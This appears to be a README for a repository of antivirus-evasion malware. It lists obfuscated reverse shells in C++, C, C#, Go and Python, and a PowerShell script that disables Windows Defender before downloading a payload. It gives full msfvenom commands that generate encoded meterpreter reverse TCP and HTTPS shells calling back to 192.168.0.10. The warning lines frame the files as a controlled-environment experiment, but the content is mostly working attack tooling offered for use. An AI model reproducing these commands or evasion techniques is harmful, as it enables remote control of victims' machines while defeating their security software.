Warning: Downloading items here will likely trigger alerts from your antivirus programs; do so in a controlled environment. Executing files here technically should pose no harm, since they only connect to a private IP, but again, do so in a controlled environment.
kib_keyboard.ps1
is a PowerShell script that disables Windows Defender and notifications, then downloads the actual payload.

kidx86.exe
is an x86 TCP reverse shell written in C++, encoded using shikata_ga_nai, with byte change, scrambled bytes, extra dummy bytes and byte order obfuscation. 12/69 hits in VirusTotal (when it was first submitted). Able to bypass Windows Defender.

kidx86_source.cpp
is the source file of the payload.

shell.c
is the raw payload from msfvenom. Generated by:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e x86/shikata_ga_nai -i 8 -f c > shell.c

shell.exe
is a generic TCP reverse shell. X

bkbx64.exe
is an x64 TCP reverse shell encoded in a custom C++ payload. X

bkbx86.exe
is an x86 TCP reverse shell encoded in a custom C++ payload. X

bkbpayload.ll and bkbpayloadraw.cs
are XOR-encoded TCP reverse shells written in a custom C# payload that uses a PowerShell file to download and execute in memory. (doesn't work)

test1.exe
is a TCP reverse shell encoded in a custom Python payload. X

testing9.exe
is an edited TCP reverse shell created using Veil before changing from .bat to .exe. X

c_rtcp.exe
is a TCP reverse shell written in C. X

cs_rtcp.exe
is a TCP reverse shell written in C#. X

go_rtcp.exe
is a TCP reverse shell written in Go. X
Generating the HTTPS reverse shell:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.10 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -e x86/shikata_ga_nai -i 8 -f c > shell.c
A number of tools and languages were used in the process of trying to bypass Windows Defender, including Veil, Metasploit Windows Defender evasion, and compiling custom payloads; we tried payloads encoded using Python, C, C++, C#, Ruby, Go and Java.